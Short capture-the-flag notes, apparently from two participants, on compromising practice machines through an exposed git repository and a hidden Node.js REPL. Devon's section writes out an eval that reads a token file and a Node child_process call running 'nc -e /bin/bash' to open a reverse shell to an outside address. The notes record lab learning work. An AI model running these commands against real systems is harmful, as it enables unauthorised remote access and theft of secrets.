# Diego

- found public git repo with dirb
- https://github.com/internetwache/GitTools
- recovered two pyc files
- these can be decompiled with https://pypi.org/project/uncompyle6/
- a remote shell awaits us after deobfuscating that shit
- no idea how to exploit privileges though and my shell is dead now ._.

# Devon

- Landscape pic
- Exif data
- Hidden route
- JS REPL
- Apparently node
- Eval `require('fs').readFileSync('/home/user/token.txt')` to get the
  flag
- Reverse shell is a bit harder
- Run `nc -lp 1234` on your machine
- `require('child_process').exec('nc -e /bin/bash 1.2.3.4 1234')`
- I tried out all kinds of things to escalate privileges, but no luck
- This was supposed to be a nginx exploit